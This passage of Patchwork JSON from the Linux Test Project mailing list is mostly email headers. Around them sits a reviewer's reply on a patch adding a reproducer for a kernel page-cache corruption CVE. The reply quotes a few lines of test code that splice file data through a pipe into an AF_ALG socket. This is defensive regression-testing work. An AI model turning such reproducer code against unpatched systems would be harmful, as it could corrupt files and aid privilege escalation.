6MZ009+UVYxBhw5aDj+VDxjl73xwAalJxI35E9EN6QIsibWxqgIdFr7qaqnnbo0Jfwmo8Dp\n KZ4ZVuv53xw8A+qEYD/7f5nIaEsGCsM=","v=1; a=rsa-sha256; c=relaxed/relaxed;\n d=suse.com; s=google; t=1777559485; x=1778164285; darn=lists.linux.it;\n h=date:content-transfer-encoding:subject:in-reply-to:cc:to:from\n :message-id:from:to:cc:subject:date:message-id:reply-to;\n bh=/wcnHzNPljPE0uqL4epYXr8bo9j0N0X+lh/11F7zz6k=;\n b=PkH5ZlIU0bqWYmir9rQK+iQNZvcbAwnWb8el6WRyS4YliBNIRcgu6vtNWX+lWrZYOP\n wcljgt9p/ljrsnOkkcSW7B5QfCRhUxlkSLGCnaWpOjMs09KqogXH9gnmcEcuXxEngRrX\n 88I61Vnh+5dEd3y8eQgRHp+FS9IQrwRF/q3t0U6PCaML/tQHq4ApRpRtAjxhfZfqIOVa\n lM3oii12t05pEPH/KoXZuqs1n3RuI+8gjYSIhi2PjcXkSWP0jFJD47w7VbsZj8rmU0Rv\n 9eg1t8pndWVvcLnTUfB8yQXROKaLF8L/aDm3vO9rCBfoheU2aemw2h87uPqItx9BlAYj\n tPjg=="],"X-Google-DKIM-Signature":"v=1; a=rsa-sha256; c=relaxed/relaxed;\n d=1e100.net; s=20251104; t=1777559485; x=1778164285;\n h=date:content-transfer-encoding:subject:in-reply-to:cc:to:from\n :message-id:x-gm-gg:x-gm-message-state:from:to:cc:subject:date\n :message-id:reply-to;\n bh=/wcnHzNPljPE0uqL4epYXr8bo9j0N0X+lh/11F7zz6k=;\n b=LU6bqf7XQ8huu8PqBUklQ84wsEHxY/r6ePsaklEok8h9xL88BqNIT4Tc7OQsannWml\n 8k41y4+v+lIFYj7Yr+MIWQcDmEQedqCAjRMM1uGmioaGnE8SgtGKutaKjlu5rYcUuV6E\n JPWF/zv5xzbh0zM2jLWlBxAzegBHEslXZT2pTl2WOJNYzMA8Lp3AjOVPljKWnOIpVsXa\n 7NHpfGbd3K2yi6Rs+j5ZULX1iTapHS6XH+YrTqLEC1a9EnLcznv5+s8jlDTjc0JnJstb\n k5gqJ+gZc6Q4LZIFdS37kmSJXjRdsIljP03551OvDSjJHU1qu5tHhw6bSt+MRV8/dhaX\n 3jbA==","X-Forwarded-Encrypted":"i=1;\n AFNElJ+PD5JQRb7AE8lN74aRQhWkwWVPz9VIFAcFrR3NMGMeLFi13T2rqVbvHe9b5HHB6sCR5f4=@lists.linux.it","X-Gm-Message-State":"AOJu0Yzjn2Ca4Ens/FdjIHerx3oUL2dC0TVakYfv0fGoFn1VLEOT0QNd\n m3uU3k6Cqo4wCgPXgipM+QpPU7UZj/iMqAGFkr7N2NHKH906n63SUKamrBkJ/6uSWlQ=","X-Gm-Gg":"AeBDieslDP1noIfpEYPHxuPyymVRqcN1dNhOsDtJLCikO1220bMzHvu23W9CKEuQZ5a\n cGlY4h5f1lhgu1MFMbJcMsHFp9uwam9obVnx6r9J3nb8DPEaFr6jWp202SfdtPJPcsvaJJlQAkb\n nQ7Nhw3ZGbRdOEe6xZsnCpajgOIrb2lOn31A53aEu2fo1pcR2fET/0K+v0djz9B5zz44uwPgPwM\n +HC0YNNgi66XJRE+m3bRO0rkQ/hqx9J8XMNuwQK5Z/AVX3/yyv8c0UlEuetjXkSIBqNW9Ri5vDZ\n Fz5HVtZpwFdY7dUOisnHH/AMPj12TOjLG+dW6XtxnNMhMoVbF4ybdnME5uExvrKS3LYiJvjIyPD\n kA2gwa/Z3occXeMfFw2T+v175JvA8d1pIZ5MnHENVb+ULn+RO6e/j3TT0kIB8mpzvN+FQr8spfF\n Un2Ztdg3DiDUBgxnHEcTpHb+fqIaZQk5dtOOpx/jzgUOpd48U8cN7epIEeLuMgBKwsWZNBr+teT\n psCZrQCaghuwMVk1tBTQv4Y/6jiOooeaKlGQJo31bNDGmSwwVcN/QTBeXXGDLxyObQSHYzNzqHF\n OoP2SmJA5idVN7dvBu5DdJs=","X-Received":"by 2002:a5d:588b:0:b0:43f:e414:b1b5 with SMTP id\n ffacd0b85a97d-4493a837d7dmr5570005f8f.0.1777559484825;\n Thu, 30 Apr 2026 07:31:24 -0700 (PDT)","Message-ID":"<69f367bc.df0a0220.323089.3259@mx.google.com>","To":"\"Martin Doucha\" <mdoucha@suse.cz>","In-Reply-To":"<605015be-e527-4cd1-b541-7721a3ba4327@suse.cz>","Date":"Thu, 30 Apr 2026 14:31:23 +0000","X-Spam-Status":"No, score=0.1 required=7.0 tests=DKIM_SIGNED,DKIM_VALID,\n DKIM_VALID_AU,DKIM_VALID_EF,SPF_HELO_NONE,SPF_PASS shortcircuit=no\n autolearn=disabled version=4.0.1","X-Spam-Checker-Version":"SpamAssassin 4.0.1 (2024-03-25) on in-7.smtp.seeweb.it","X-Virus-Scanned":"clamav-milter 1.0.9 at in-7.smtp.seeweb.it","X-Virus-Status":"Clean","Subject":"Re: [LTP] [PATCH v2 2/2] cve-2026-31431: Add page cache corruption\n reproducer","X-BeenThere":"ltp@lists.linux.it","X-Mailman-Version":"2.1.29","Precedence":"list","List-Id":"Linux Test Project <ltp.lists.linux.it>","List-Unsubscribe":"<https://lists.linux.it/options/ltp>,\n <mailto:ltp-request@lists.linux.it?subject=unsubscribe>","List-Archive":"<http://lists.linux.it/pipermail/ltp/>","List-Post":"<mailto:ltp@lists.linux.it>","List-Help":"<mailto:ltp-request@lists.linux.it?subject=help>","List-Subscribe":"<https://lists.linux.it/listinfo/ltp>,\n <mailto:ltp-request@lists.linux.it?subject=subscribe>","From":"Andrea Cervesato via ltp <ltp@lists.linux.it>","Reply-To":"Andrea Cervesato <andrea.cervesato@suse.com>","Cc":"Linux Test Project <ltp@lists.linux.it>","MIME-Version":"1.0","Content-Type":"text/plain; charset=\"us-ascii\"","Content-Transfer-Encoding":"7bit","Errors-To":"ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it","Sender":"\"ltp\" <ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it>"}},{"id":3684805,"web_url":"http://patchwork.ozlabs.org/comment/3684805/","msgid":"<afN5UVfVzGB9l29L@yuki.lan>","list_archive_url":null,"date":"2026-04-30T15:46:25","subject":"Re: [LTP] [PATCH v2 2/2] cve-2026-31431: Add page cache corruption\n reproducer","submitter":{"id":8530,"url":"http://patchwork.ozlabs.org/api/people/8530/","name":"Cyril Hrubis","email":"chrubis@suse.cz"},"content":"Hi!\n> +\tTEST(splice(file_fd, &off_in, pipefd[1], NULL, OVERWRITE_SIZE, 0));\n> +\tif (TST_RET < 0)\n> +\t\ttst_brk(TBROK | TTERRNO, \"splice(file -> pipe)\");\n> +\n> +\tTEST(splice(pipefd[0], NULL, reqfd, NULL, OVERWRITE_SIZE, 0));\n> +\tif (TST_RET < 0)\n> +\t\ttst_brk(TBROK | TTERRNO, \"splice(pipe -> AF_ALG)\");\n\nI guess that we should add SAFE_SPLICE() but we can as well do that on\nthe top of this patch.\n\nReviewed-by: Cyril Hrubis <chrubis@suse.cz>","headers":{"Return-Path":"<ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it>","X-Original-To":["incoming@patchwork.ozlabs.org","ltp@lists.linux.it"],"Delivered-To":["patchwork-incoming@legolas.ozlabs.org","ltp@picard.linux.it"],"Authentication-Results":["legolas.ozlabs.org;\n\tdkim=fail reason=\"signature verification failed\" (1024-bit key;\n unprotected) header.d=suse.cz header.i=@suse.cz header.a=rsa-sha256\n header.s=susede2_rsa header.b=XW7X0iT0;\n\tdkim=fail reason=\"signature verification failed\" header.d=suse.cz\n header.i=@suse.cz header.a=ed25519-sha256 header.s=susede2_ed25519\n header.b=vucU8ub8;\n\tdkim=fail reason=\"signature verification failed\" (1024-bit key)\n header.d=suse.cz header.i=@suse.cz header.a=rsa-sha256 header.s=susede2_rsa\n header.b=XW7X0iT0;\n\tdkim=neutral header.d=suse.cz header.i=@suse.cz header.a=ed25519-sha256\n header.s=susede2_ed25519 header.b=vucU8ub8;\n\tdkim-atps=neutral","legolas.ozlabs.org;\n spf=pass (sender SPF authorized) smtp.mailfrom=lists.linux.it\n (client-ip=2001:1418:10:5::2; helo=picard.linux.it;\n envelope-from=ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it;\n receiver=patchwork.ozlabs.org)","smtp-out1.suse.de;\n\tnone"],"Received":["from picard.linux.it (picard.linux.it [IPv6:2001:1418:10:5::2])\n\t(using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n\t key-exchange x25519)\n\t(No client certificate requested)\n\tby legolas.ozlabs.org (Postfix) with ESMTPS id 4g5z704RF7z1yGq\n\tfor <incoming@patchwork.ozlabs.org>; Fri, 01 May 2026 01:46:35 +1000 (AEST)","from picard.linux.it (localhost [IPv6:::1])\n\tby picard.linux.it (Postfix) with ESMTP id A146C3E6C94\n\tfor <incoming@patchwork.ozlabs.org>; Thu, 30 Apr 2026 17:46:33 +0200 (CEST)","from in-5.smtp.seeweb.it (in-5.smtp.seeweb.it [217.194.8.5])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature ECDSA (secp384r1))\n (No client certificate requested)\n by picard.linux.it (Postfix) with ESMTPS id 07ACC3E200D\n for <ltp@lists.linux.it>; Thu, 30 Apr 2026 17:46:30 +0200 (CEST)","from smtp-out1.suse.de (smtp-out1.suse.de\n [IPv6:2a07:de40:b251:101:10:150:64:1])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest\n SHA256)\n (No client certificate requested)\n by in-5.smtp.seeweb.it (Postfix) with ESMTPS id 79E2960014D\n for <ltp@lists.linux.it>; Thu, 30 Apr 2026 17:46:30 +0200 (CEST)","from imap1.dmz-prg2.suse.org (unknown [10.150.64.97])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest\n SHA256)\n (No client certificate requested)\n by smtp-out1.suse.de (Postfix) with ESMTPS id 202666A7CE;\n Thu, 30 Apr 2026 15:46:29 +0000 (UTC)","from imap1.dmz-prg2.suse.org (localhost [127.0.0.1])\n (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)\n key-exchange X25519 server-signature RSA-PSS (4096 bits) server-digest\n SHA256)\n (No client certificate requested)\n by imap1.dmz-prg2.suse.org (Postfix) with ESMTPS id 0FEFA593B0;\n Thu, 30 Apr 2026 15:46:29 +0000 (UTC)","from dovecot-director2.suse.de ([2a07:de40:b281:106:10:150:64:167])\n by imap1.dmz-prg2.suse.org with ESMTPSA id LK7UAlV582mnPwAAD6G6ig\n (envelope-from <chrubis@suse.cz>); Thu, 30 Apr 2026 15:46:29 +0000"],"DKIM-Signature":["v=1; a=rsa-sha256; c=relaxed/relaxed; d=suse.cz;\n s=susede2_rsa;\n t=1777563989;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n in-reply-to:in-reply-to:references:references;\n bh=ztxqicIAZvD5hNr9cekM4QNn/kixtY6+p+PX91YVzM4=;\n b=XW7X0iT0Ms/QMdfWb2MGXltYIr2Y2qdcabRdx+zieef+SFiJ4ZR+9VNb+GFi8BrovFpkzg\n hrrZ6OOns4xUrpdaE7eyW5VheR2NfoczPdRrsCG4Fhiaf9skommlLSMEYGJDecDRAq5cnU\n PawQ10jusWkDWwzagcUvNgmBKL12n8g=","v=1; a=ed25519-sha256; c=relaxed/relaxed; d=suse.cz;\n s=susede2_ed25519; t=1777563989;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n in-reply-to:in-reply-to:references:references;\n bh=ztxqicIAZvD5hNr9cekM4QNn/kixtY6+p+PX91YVzM4=;\n b=vucU8ub82elz9e2ypQT8x53v2u/v9+u+5x4bIVimja73ttWKMFyjDg4OOuW8TP09GQQMwg\n QxeaGmsXrq7Xq9DA==","v=1; a=rsa-sha256; c=relaxed/relaxed; d=suse.cz;\n s=susede2_rsa;\n t=1777563989;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n in-reply-to:in-reply-to:references:references;\n bh=ztxqicIAZvD5hNr9cekM4QNn/kixtY6+p+PX91YVzM4=;\n b=XW7X0iT0Ms/QMdfWb2MGXltYIr2Y2qdcabRdx+zieef+SFiJ4ZR+9VNb+GFi8BrovFpkzg\n hrrZ6OOns4xUrpdaE7eyW5VheR2NfoczPdRrsCG4Fhiaf9skommlLSMEYGJDecDRAq5cnU\n PawQ10jusWkDWwzagcUvNgmBKL12n8g=","v=1; a=ed25519-sha256; c=relaxed/relaxed; d=suse.cz;\n s=susede2_ed25519; t=1777563989;\n h=from:from:reply-to:date:date:message-id:message-id:to:to:cc:cc:\n mime-version:mime-version:content-type:content-type:\n in-reply-to:in-reply-to:references:references;\n bh=ztxqicIAZvD5hNr9cekM4QNn/kixtY6+p+PX91YVzM4=;\n b=vucU8ub82elz9e2ypQT8x53v2u/v9+u+5x4bIVimja73ttWKMFyjDg4OOuW8TP09GQQMwg\n QxeaGmsXrq7Xq9DA=="],"Date":"Thu, 30 Apr 2026 17:46:25 +0200","From":"Cyril Hrubis <chrubis@suse.cz>","To":"Andrea Cervesato <andrea.cervesato@suse.de>","Message-ID":"<afN5UVfVzGB9l29L@yuki.lan>","References":"<20260430-cve-2026-31431-v2-0-1136c09ca67b@suse.com>\n <20260430-cve-2026-31431-v2-2-1136c09ca67b@suse.com>","MIME-Version":"1.0","Content-Disposition":"inline","In-Reply-To":"<20260430-cve-2026-31431-v2-2-1136c09ca67b@suse.com>","X-Spamd-Result":"default: False [-4.30 / 50.00]; BAYES_HAM(-3.00)[100.00%];\n NEURAL_HAM_LONG(-1.00)[-1.000];\n NEURAL_HAM_SHORT(-0.20)[-1.000]; MIME_GOOD(-0.10)[text/plain];\n RCVD_VIA_SMTP_AUTH(0.00)[];\n FUZZY_RATELIMITED(0.00)[rspamd.com]; ARC_NA(0.00)[];\n MISSING_XM_UA(0.00)[]; RCPT_COUNT_TWO(0.00)[2];\n RCVD_TLS_ALL(0.00)[];\n DKIM_SIGNED(0.00)[suse.cz:s=susede2_rsa,suse.cz:s=susede2_ed25519];\n TO_DN_ALL(0.00)[]; FROM_HAS_DN(0.00)[]; MIME_TRACE(0.00)[0:+];\n FROM_EQ_ENVFROM(0.00)[]; TO_MATCH_ENVRCPT_ALL(0.00)[];\n RCVD_COUNT_TWO(0.00)[2];\n DBL_BLOCKED_OPENRESOLVER(0.00)[imap1.dmz-prg2.suse.org:helo,suse.cz:email]","X-Spam-Score":"-4.30","X-Spam-Level":"","X-Spam-Status":"No, score=0.1 required=7.0 tests=DKIM_SIGNED,DKIM_VALID,\n DKIM_VALID_AU,DKIM_VALID_EF,SPF_HELO_NONE,SPF_PASS shortcircuit=no\n autolearn=disabled version=4.0.1","X-Spam-Checker-Version":"SpamAssassin 4.0.1 (2024-03-25) on in-5.smtp.seeweb.it","X-Virus-Scanned":"clamav-milter 1.0.9 at in-5.smtp.seeweb.it","X-Virus-Status":"Clean","Subject":"Re: [LTP] [PATCH v2 2/2] cve-2026-31431: Add page cache corruption\n reproducer","X-BeenThere":"ltp@lists.linux.it","X-Mailman-Version":"2.1.29","Precedence":"list","List-Id":"Linux Test Project <ltp.lists.linux.it>","List-Unsubscribe":"<https://lists.linux.it/options/ltp>,\n <mailto:ltp-request@lists.linux.it?subject=unsubscribe>","List-Archive":"<http://lists.linux.it/pipermail/ltp/>","List-Post":"<mailto:ltp@lists.linux.it>","List-Help":"<mailto:ltp-request@lists.linux.it?subject=help>","List-Subscribe":"<https://lists.linux.it/listinfo/ltp>,\n <mailto:ltp-request@lists.linux.it?subject=subscribe>","Cc":"Linux Test Project <ltp@lists.linux.it>","Content-Type":"text/plain; charset=\"us-ascii\"","Content-Transfer-Encoding":"7bit","Errors-To":"ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it","Sender":"\"ltp\" <ltp-bounces+incoming=patchwork.ozlabs.org@lists.linux.it>"}}]